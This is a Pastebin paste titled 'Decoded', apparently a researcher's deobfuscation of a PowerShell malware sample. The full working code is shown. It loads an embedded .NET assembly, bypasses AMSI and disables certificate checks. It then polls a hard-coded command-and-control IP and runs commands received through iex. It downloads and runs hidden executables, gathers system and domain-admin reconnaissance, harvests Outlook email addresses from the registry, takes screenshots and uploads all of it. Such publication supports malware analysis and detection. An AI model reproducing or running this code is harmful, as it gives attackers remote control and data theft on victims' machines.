James_inthe_box

Decoded

Mar 9th, 2020
16,070
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 13.71 KB | None | 0 0
  1. $NNLYGF = [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("MTYyLjI0NC4zMi4yMTA="))
  2. $cyzdkER = New-Object IO.Compression.GzipStream([IO.MemoryStream][Convert]::FromBase64String("MZ^C^D@^N^_^N !^AL!This program cannot be run in DOS mode.
  3. $PEL^A^CF]^^B!^K^A^H$^FB `@ ^B^D^D^B^C@^P^P^P^P^PBK`^B^L^H H.text" $^B `.rsrc^B`^D&@@.reloc^L^B*@BBH^B^E1^P^A^S0^D!^A^A^Q^Br^Apo^F
  4. Module>tools.dllVOSuZYD8FNKOxAbCmS6aZr57rLmscorlibSystemObjectMulticastDelegateVirtualAllocCreateThreadGetExitCodeThreadWaitForSingleObjectciigDofE2WJKuCPMXAeavFzIAwjrVzS
  5. ystem.ReflectionAssemblyEY8boPKQ66jxWGGzCVW4NFU96JN1jsIFABX0gUS0qiEEH2hcikKINKE7eLklFpgmeHqrGdVhyf0Ao3srLCSD0NpfmZzGsvKNWvNloWsf0gNbVY3kORjoXPXYJ0NBBsB30BKDm66dTucfS08BLyHjD.ctorInvokeIAsyncResultAsyncCallbackBeginInvokeEndInvokeabcdefSystem.Run
  6. time.InteropServicesMarshalAsAttributeUnmanagedTypeOutAttributebytessinputoutputkeydataividstatuspostobjectmethodparamcallbackresultSystem.Runtime.CompilerServicesCompilationRelaxationsAttributeRuntimeCompatibilityAttributetoolsDllImportAttribut
  7. ekernel32kernel32.dllTypeGetTypeFieldInfoBindingFlagsGetFieldBooleanSetValueEnvironmentOperatingSystemget_OSVersionVersionget_VersionSystem.Security.PrincipalWindowsIdentityGetCurrentSecurityIdentifierget_UserIdentityReferenceget_ValueCharString
  8. SplitSystem.IOMemoryStreamBinaryWriterStreamUInt32ParseWriteSystem.TextEncodingget_Unicodeget_MachineNameGetBytesIntPtrget_Sizeget_Majorget_Minorget_BuildCloseToArrayEmptyStringBuilderAppendToStringget_LengthRandomget_CharsNextByteBitConverterTo
  9. UInt32ConcatNextBytesArrayCopyBinaryReaderReadUInt32ReadBytesMarshalToInt64Zeroop_Explicitop_EqualityGetLastWin32ErrorRuntimeTypeHandleGetTypeFromHandleDelegateGetDelegateForFunctionPointer.cctor<PrivateImplementationDetails>{ABD96C57-B1A0-4231-
  10. 99EC-8FB36F9D429D}CompilerGeneratedAttributeValueType__StaticArrayInitTypeSize=808$$method0x6000017-1RuntimeHelpersRuntimeFieldHandleInitializeArray__StaticArrayInitTypeSize=1019$$method0x6000017-2UnmanagedFunctionPointerAttributeCallingConventi
  11. onMSystem.Management.Automation.AmsiUtils^]amsiInitFailed^C/ .asp .jpgWl1Boz\V
  12.  
  13. ^AInternalNametools.dll(^B^ALegalCopyright <
  14. ^AOriginalFilenametools.dll^AProductVersion0.0.0.0^AAssembly Version0.0.0.0@^L2"), [IO.Compression.CompressionMode]::Decompress)
  15. $rbUlVfzYtPXFVR = New-Object byte[](20480)
  16. $cyzdkER.Read($rbUlVfzYtPXFVR, 0, 20480) | Out-Null
  17. [System.Reflection.Assembly]::Load($rbUlVfzYtPXFVR) | Out-Null
  18. [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
  19. [VOSuZYD8FN.VOSuZYD8FN]::EY8boPKQ66jxWGG([Ref].Assembly)
  20. iex ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("ZnVuY3Rpb24gellXWXA4UklzKFtzdHJpbmddICRwYXRoKQp7CiAgICAkQkVWaTJ0eiA9ICIiCiAgICB0cnkgewogICAgICAgICRIdzY2bVZnWUsgPSAoR2V0LUl0ZW1Qcm9wZXJ0eSAkcGF0aCB8IFdoZXJlIHskXyAtbWF0Y2ggJ0FjY291bnQgTmFtZSd9KQogICAgICAgIGZvcmVhY2ggKCRtIGluICRIdzY2bVZnWUspIHsKICAgICAgICAgICAgdHJ5IHsKICAgICAgICAgICAgICAgIGlmICgkbS4iQWNjb3VudCBOYW1lIi5HZXRUeXBlKCkuSXNBcnJheSkgewogICAgICAgICAgICAgICAgICAgICRtbCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVuaWNvZGUuR2V0U3RyaW5nKCRtLiJBY2NvdW50IE5hbWUiKQogICAgICAgICAgICAgICAgfSBlbHNlIHskbWwgPSAkbS4iQWNjb3VudCBOYW1lIn0KICAgICAgICAgICAgICAgIGlmICgkbWwgLW1hdGNoICJAIikgewogICAgICAgICAgICAgICAgICAgICRCRVZpMnR6ICs9ICJlbWFpbDogIiArICRtbCArICJgbiIKICAgICAgICAgICAgICAgIH0KICAgICAgICAgICAgfSBjYXRjaCB7fQogICAgICAgIH0KICAgICAgICAkSHc2Nm1WZ1lLID0gKEdldC1JdGVtUHJvcGVydHkgJHBhdGggfCBXaGVyZSB7JF8gLW1hdGNoICdFbWFpbCd9KQogICAgICAgIGZvcmVhY2ggKCRtIGluICRIdzY2bVZnWUspIHsKICAgICAgICAgICAgdHJ5IHsKICAgICAgICAgICAgICAgIGlmICgkbS5FbWFpbC5HZXRUeXBlKCkuSXNBcnJheSkgewogICAgICAgICAgICAgICAgICAgICRtbCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVuaWNvZGUuR2V0U3RyaW5nKCRtLkVtYWlsKQogICAgICAgICAgICAgICAgfSBlbHNlIHskbWwgPSAkbS5FbWFpbH0KICAgICAgICAgICAgICAgICRCRVZpMnR6ICs9ICJlbWFpbDogIiArICRtbCArICJgbiIKICAgICAgICAgICAgfSBjYXRjaCB7fQogICAgICAgIH0gICAgICAgIAogICAgfSBjYXRjaCB7fQogICAgJEJFVmkydHoKfQpmdW5jdGlvbiBxeXVCaE5EOHltQnphaihbaW50XSRBNXd1ckdra3FIUE9EbiwgW2J5dGVbXV0kQ1gxZW9ZNTREKQp7CiAgICAkWG1qellOVm94cXkgPSAiaHR0cHM6Ly8kTk5MWUdGLyIgKyBbVk9TdVpZRDhGTi5WT1N1WllEOEZOXTo6cGZtWnpHc3ZLTld2TmwoJEE1d3VyR2trcUhQT0RuLCAwLCAkdHJ1ZSkKICAgICRhWTRZMmdaTjEgPSBbVk9TdVpZRDhGTi5WT1N1WllEOEZOXTo6b1dzZjBnTmIoJENYMWVvWTU0RCkKICAgIChOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5VcGxvYWREYXRhKCRYbWp6WU5Wb3hxeSwgJGFZNFkyZ1pOMSkKfQpmdW5jdGlvbiB3alJ6Qmsydmt2KCkKewogICAgaWYgKCgoKEdldC1XbWlPYmplY3QgV2luMzJfQ29tcHV0ZXJTeXN0ZW0pLnBhcnRvZmRvbWFpbikgLWVxICRGYWxzZSApIC1vciAoIC1ub3QgJEVudjpVU0VSRE5TRE9NQUlOKSkKICAgIHsKICAgICAgICAkQkVWaTJ0eiA9ICJET01BSU46IE5PYG5gbiIKICAgIH0gZWxzZSB7ICRCRVZpMnR6ID0gIkRPTUFJTjogWUVTYG5gbiJ9CiAgICAkQkVWaTJ0eiArPSAiU1lTVEVNSU5GTzpgbmBuIiArICgoc3lzdGVtaW5mbykgLWpvaW4gImBuIikKICAgICRCRVZpMnR6ICs9ICJgbmBuSVBDT05GSUc6YG5gbiIgKyAoKGlwY29uZmlnIC9hbGwpIC1qb2luICJgbiIpCiAgICAkQkVWaTJ0eiArPSAiYG5gbk5FVFNUQVQ6YG5gbiIgKyAoKG5ldHN0YXQgLWYpIC1qb2luICJgbiIpCiAgICAkQkVWaTJ0eiArPSAiYG5gbk5FVFZJRVc6YG5gbiIgKyAoKG5ldCB2aWV3KSAtam9pbiAiYG4iKQogICAgJEJFVmkydHogKz0gImBuYG5UQVNLTElTVDpgbmBuIiArICgodGFza2xpc3QpIC1qb2luICJgbiIpCiAgICAkQkVWaTJ0eiArPSAiYG5gbldIT0FNSTpgbmBuIiArICgod2hvYW1pKSAtam9pbiAiYG4iKQogICAgJEJFVmkydHogKz0gImBuYG5VU0VSTkFNRTpgbmBuIiArICgobmV0IHVzZXIgJGVudjp1c2VybmFtZSAvZG9tYWluKSAtam9pbiAiYG4iKQogICAgJEJFVmkydHogKz0gImBuYG5ET01BSU4gQURNSU5TOmBuYG4iICsgKChuZXQgZ3JvdXAgImRvbWFpbiBhZG1pbnMiIC9kb21haW4gKSAtam9pbiAiYG4iKQogICAgJEJFVmkydHogKz0gImBuYG5ERVNLVE9QOmBuYG4iICsgKEdldC1DaGlsZEl0ZW0gKFtlbnZpcm9ubWVudF06OmdldGZvbGRlcnBhdGgoImRlc2t0b3AiKSkgfCBPdXQtU3RyaW5nKQogICAgJEJFVmkydHogKz0gImBuYG5BVjpgbmBuIiArIChHZXQtV21pT2JqZWN0IC1OYW1lc3BhY2UgInJvb3RcU2VjdXJpdHlDZW50ZXIyIiAtUXVlcnkgIlNFTEVDVCAqIEZST00gQW50aVZpcnVzUHJvZHVjdCIpLmRpc3BsYXlOYW1lCiAgICAkQ1gxZW9ZNTREID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRCeXRlcygkQkVWaTJ0eikKICAgIHF5dUJoTkQ4eW1CemFqIDAgJENYMWVvWTU0RAp9CmZ1bmN0aW9uIGM3RUpKWDUoKQp7CiAgICAkQkVWaTJ0eiA9ICIiCiAgICAkQkVWaTJ0eiArPSB6WVdZcDhSSXMgImhrY3U6XFNvZnR3YXJlXE1pY3Jvc29mdFxPZmZpY2VcMTYuMFxPdXRsb29rXFByb2ZpbGVzXCpcOTM3NUNGRjA0MTMxMTFkM0I4OEEwMDEwNEIyQTY2NzZcKiIKICAgICRCRVZpMnR6ICs9IHpZV1lwOFJJcyAiaGtjdTpcU29mdHdhcmVcTWljcm9zb2Z0XE9mZmljZVwxNS4wXE91dGxvb2tcUHJvZmlsZXNcKlw5Mzc1Q0ZGMDQxMzExMWQzQjg4QTAwMTA0QjJBNjY3NlwqIgogICAgJEJFVmkydHogKz0gellXWXA4UklzICJoa2N1OlxTb2Z0d2FyZVxNaWNyb3NvZnRcV2luZG93cyBOVFxDdXJyZW50VmVyc2lvblxXaW5kb3dzIE1lc3NhZ2luZyBTdWJzeXN0ZW1cUHJvZmlsZXNcT3V0bG9va1w5Mzc1Q0ZGMDQxMzExMWQzQjg4QTAwMTA0QjJBNjY3NlwqIgogICAgaWYgKCRCRVZpMnR6IC1uZSAiIikKICAgIHsKICAgICAgICAkQ1gxZW9ZNTREID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRCeXRlcygkQkVWaTJ0eikKICAgICAgICBxeXVCaE5EOHltQnphaiAxICRDWDFlb1k1NEQKICAgIH0KfQpmdW5jdGlvbiBudVFuaFQ1ZUszQnhydHRWKCkKewogICAgQWRkLVR5cGUgLUFzc2VtYmx5IFN5c3RlbS5XaW5kb3dzLkZvcm1zCiAgICAkR243NDR2SiA9IFtXaW5kb3dzLkZvcm1zLlN5c3RlbUluZm9ybWF0aW9uXTo6VmlydHVhbFNjcmVlbgogICAgJHhNSENaTzk4V1dXeDdaeCA9IE5ldy1PYmplY3QgRHJhd2luZy5CaXRtYXAgJEduNzQ0dkouV2lkdGgsICRHbjc0NHZKLkhlaWdodAogICAgJERSeXdrc2hCQmhwID0gW0RyYXdpbmcuR3JhcGhpY3NdOjpGcm9tSW1hZ2UoJHhNSENaTzk4V1dXeDdaeCkKICAgICREUnl3a3NoQkJocC5Db3B5RnJvbVNjcmVlbigkR243NDR2Si5Mb2NhdGlvbiwgW0RyYXdpbmcuUG9pbnRdOjpFbXB0eSwgJEduNzQ0dkouU2l6ZSkKICAgICREUnl3a3NoQkJocC5EaXNwb3NlKCkKICAgICRCWEQyMk82ID0gTmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtCiAgICAkVHNDRDR4dE09NDAKICAgICRhWTRZMmdaTjFvZGVyUGFyYW1zID0gTmV3LU9iamVjdCBTeXN0ZW0uRHJhd2luZy5JbWFnaW5nLkVuY29kZXJQYXJhbWV0ZXJzCiAgICAkYVk0WTJnWk4xb2RlclBhcmFtcy5QYXJhbVswXSA9IE5ldy1PYmplY3QgRHJhd2luZy5JbWFnaW5nLkVuY29kZXJQYXJhbWV0ZXIgKFtTeXN0ZW0uRHJhd2luZy5JbWFnaW5nLkVuY29kZXJdOjpRdWFsaXR5LCAkVHNDRDR4dE0pCiAgICAkV0RqcXpLWlVKbyA9IFtEcmF3aW5nLkltYWdpbmcuSW1hZ2VDb2RlY0luZm9dOjpHZXRJbWFnZUVuY29kZXJzKCkgfCBXaGVyZS1PYmplY3QgeyAkXy5Gb3JtYXREZXNjcmlwdGlvbiAtZXEgIkpQRUciIH0KICAgICR4TUhDWk85OFdXV3g3Wnguc2F2ZSgkQlhEMjJPNiwgJFdEanF6S1pVSm8sICRhWTRZMmdaTjFvZGVyUGFyYW1zKQogICAgJHhNSENaTzk4V1dXeDdaeC5EaXNwb3NlKCkKICAgICRDWDFlb1k1NEQgPSBbY29udmVydF06OlRvQmFzZTY0U3RyaW5nKCRCWEQyMk82LlRvQXJyYXkoKSkKICAgICRDWDFlb1k1NEQgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpBU0NJSS5HZXRCeXRlcygkQ1gxZW9ZNTREKQogICAgcXl1QmhORDh5bUJ6YWogMiAkQ1gxZW9ZNTRECn0Kd2pSekJrMnZrdgpjN0VKSlg1Cm51UW5oVDVlSzNCeHJ0dFY=")))
  21. while ($true)
  22. {
  23. $te3w8Flw = New-Object System.Net.WebClient
  24. $Qo4VVv = "https://$NNLYGF/" + [VOSuZYD8FN.VOSuZYD8FN]::pfmZzGsvKNWvNl(0, 0, $False)
  25. $o2DtmQ7f0UJFsmJi = $te3w8Flw.DownloadData($Qo4VVv)
  26. if ($o2DtmQ7f0UJFsmJi.Length -ge 48)
  27. {
  28. $XwlJhkbtP = [BitConverter]::ToUInt32($o2DtmQ7f0UJFsmJi, 0)
  29. $iJ9xO2Wezr = [BitConverter]::ToUInt32($o2DtmQ7f0UJFsmJi, 4)
  30. $tObLrJ = [VOSuZYD8FN.VOSuZYD8FN]::VY3kORjoXPXYJ0N($o2DtmQ7f0UJFsmJi[8..$o2DtmQ7f0UJFsmJi.Length])
  31. $AfHhsmJSgK1ruO = 100
  32. $DzHOZ5W = $False
  33. if ($tObLrJ -ne $null)
  34. {
  35. if ($XwlJhkbtP -eq 0)
  36. {
  37. $AfHhsmJSgK1ruO = [VOSuZYD8FN.VOSuZYD8FN]::BBsB30BKDm66($tObLrJ)
  38. }
  39. elseif ($XwlJhkbtP -eq 1)
  40. {
  41. try {
  42. $wLPf5Q11AUnp5XaA = iex ([System.Text.Encoding]::UTF8.GetString($tObLrJ)) -ErrorAction Stop | Format-Table -wrap | Out-String
  43. } catch {
  44. $wLPf5Q11AUnp5XaA = $_.Exception
  45. }
  46. $wLPf5Q11AUnp5XaA = [System.Text.Encoding]::UTF8.GetBytes($wLPf5Q11AUnp5XaA)
  47. qyuBhND8ymBzaj 3 $wLPf5Q11AUnp5XaA
  48. $AfHhsmJSgK1ruO = 0
  49. }
  50. elseif ($XwlJhkbtP -eq 2)
  51. {
  52. $AfHhsmJSgK1ruO = [VOSuZYD8FN.VOSuZYD8FN]::dTucfS08BLyHjD($tObLrJ)
  53. }
  54. elseif ($XwlJhkbtP -eq 3)
  55. {
  56. $ROcjouD = Get-Random
  57. $SacHMK7Mj0 = "$env:TEMP\$ROcjouD.exe"
  58. [System.IO.File]::WriteAllBytes($SacHMK7Mj0, $tObLrJ)
  59. $AfHhsmJSgK1ruO = 0
  60. try {
  61. Start-Process $SacHMK7Mj0 -windowstyle hidden -ErrorAction Stop
  62. Start-Sleep -s 9
  63. Remove-Item $SacHMK7Mj0
  64. } catch { $AfHhsmJSgK1ruO = 1}
  65. }
  66. elseif ($XwlJhkbtP -eq 99) { $AfHhsmJSgK1ruO = 0; $DzHOZ5W = $true}
  67. }
  68. $te3w8Flw.DownloadData("https://$NNLYGF/" + [VOSuZYD8FN.VOSuZYD8FN]::pfmZzGsvKNWvNl($iJ9xO2Wezr, $AfHhsmJSgK1ruO, $False)) | Out-Null
  69. }
  70. if ($DzHOZ5W) { Exit }
  71. Start-Sleep -s (Get-Random -Input @(198..249))
  72.  
  73.  
  74. ################
  75. function zYWYp8RIs([string] $path)
  76. {
  77. $BEVi2tz = ""
  78. try {
  79. $Hw66mVgYK = (Get-ItemProperty $path | Where {$_ -match 'Account Name'})
  80. foreach ($m in $Hw66mVgYK) {
  81. try {
  82. if ($m."Account Name".GetType().IsArray) {
  83. $ml = [System.Text.Encoding]::Unicode.GetString($m."Account Name")
  84. } else {$ml = $m."Account Name"}
  85. if ($ml -match "@") {
  86. $BEVi2tz += "email: " + $ml + "`n"
  87. }
  88. } catch {}
  89. }
  90. $Hw66mVgYK = (Get-ItemProperty $path | Where {$_ -match 'Email'})
  91. foreach ($m in $Hw66mVgYK) {
  92. try {
  93. if ($m.Email.GetType().IsArray) {
  94. $ml = [System.Text.Encoding]::Unicode.GetString($m.Email)
  95. } else {$ml = $m.Email}
  96. $BEVi2tz += "email: " + $ml + "`n"
  97. } catch {}
  98. }
  99. } catch {}
  100. $BEVi2tz
  101. }
  102. function qyuBhND8ymBzaj([int]$A5wurGkkqHPODn, [byte[]]$CX1eoY54D)
  103. {
  104. $XmjzYNVoxqy = "https://$NNLYGF/" + [VOSuZYD8FN.VOSuZYD8FN]::pfmZzGsvKNWvNl($A5wurGkkqHPODn, 0, $true)
  105. $aY4Y2gZN1 = [VOSuZYD8FN.VOSuZYD8FN]::oWsf0gNb($CX1eoY54D)
  106. (New-Object System.Net.WebClient).UploadData($XmjzYNVoxqy, $aY4Y2gZN1)
  107. }
  108. function wjRzBk2vkv()
  109. {
  110. if ((((Get-WmiObject Win32_ComputerSystem).partofdomain) -eq $False ) -or ( -not $Env:USERDNSDOMAIN))
  111. {
  112. $BEVi2tz = "DOMAIN: NO`n`n"
  113. } else { $BEVi2tz = "DOMAIN: YES`n`n"}
  114. $BEVi2tz += "SYSTEMINFO:`n`n" + ((systeminfo) -join "`n")
  115. $BEVi2tz += "`n`nIPCONFIG:`n`n" + ((ipconfig /all) -join "`n")
  116. $BEVi2tz += "`n`nNETSTAT:`n`n" + ((netstat -f) -join "`n")
  117. $BEVi2tz += "`n`nNETVIEW:`n`n" + ((net view) -join "`n")
  118. $BEVi2tz += "`n`nTASKLIST:`n`n" + ((tasklist) -join "`n")
  119. $BEVi2tz += "`n`nWHOAMI:`n`n" + ((whoami) -join "`n")
  120. $BEVi2tz += "`n`nUSERNAME:`n`n" + ((net user $env:username /domain) -join "`n")
  121. $BEVi2tz += "`n`nDOMAIN ADMINS:`n`n" + ((net group "domain admins" /domain ) -join "`n")
  122. $BEVi2tz += "`n`nDESKTOP:`n`n" + (Get-ChildItem ([environment]::getfolderpath("desktop")) | Out-String)
  123. $BEVi2tz += "`n`nAV:`n`n" + (Get-WmiObject -Namespace "root\SecurityCenter2" -Query "SELECT * FROM AntiVirusProduct").displayName
  124. $CX1eoY54D = [System.Text.Encoding]::UTF8.GetBytes($BEVi2tz)
  125. qyuBhND8ymBzaj 0 $CX1eoY54D
  126. }
  127. function c7EJJX5()
  128. {
  129. $BEVi2tz = ""
  130. $BEVi2tz += zYWYp8RIs "hkcu:\Software\Microsoft\Office\16.0\Outlook\Profiles\*\9375CFF0413111d3B88A00104B2A6676\*"
  131. $BEVi2tz += zYWYp8RIs "hkcu:\Software\Microsoft\Office\15.0\Outlook\Profiles\*\9375CFF0413111d3B88A00104B2A6676\*"
  132. $BEVi2tz += zYWYp8RIs "hkcu:\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\*"
  133. if ($BEVi2tz -ne "")
  134. {
  135. $CX1eoY54D = [System.Text.Encoding]::UTF8.GetBytes($BEVi2tz)
  136. qyuBhND8ymBzaj 1 $CX1eoY54D
  137. }
  138. }
  139. function nuQnhT5eK3BxrttV()
  140. {
  141. Add-Type -Assembly System.Windows.Forms
  142. $Gn744vJ = [Windows.Forms.SystemInformation]::VirtualScreen
  143. $xMHCZO98WWWx7Zx = New-Object Drawing.Bitmap $Gn744vJ.Width, $Gn744vJ.Height
  144. $DRywkshBBhp = [Drawing.Graphics]::FromImage($xMHCZO98WWWx7Zx)
  145. $DRywkshBBhp.CopyFromScreen($Gn744vJ.Location, [Drawing.Point]::Empty, $Gn744vJ.Size)
  146. $DRywkshBBhp.Dispose()
  147. $BXD22O6 = New-Object System.IO.MemoryStream
  148. $TsCD4xtM=40
  149. $aY4Y2gZN1oderParams = New-Object System.Drawing.Imaging.EncoderParameters
  150. $aY4Y2gZN1oderParams.Param[0] = New-Object Drawing.Imaging.EncoderParameter ([System.Drawing.Imaging.Encoder]::Quality, $TsCD4xtM)
  151. $WDjqzKZUJo = [Drawing.Imaging.ImageCodecInfo]::GetImageEncoders() | Where-Object { $_.FormatDescription -eq "JPEG" }
  152. $xMHCZO98WWWx7Zx.save($BXD22O6, $WDjqzKZUJo, $aY4Y2gZN1oderParams)
  153. $xMHCZO98WWWx7Zx.Dispose()
  154. $CX1eoY54D = [convert]::ToBase64String($BXD22O6.ToArray())
  155. $CX1eoY54D = [System.Text.Encoding]::ASCII.GetBytes($CX1eoY54D)
  156. qyuBhND8ymBzaj 2 $CX1eoY54D
  157. }
  158. wjRzBk2vkv
  159. c7EJJX5
  160. nuQnhT5eK3BxrttV
Add Comment
Please, Sign In to add comment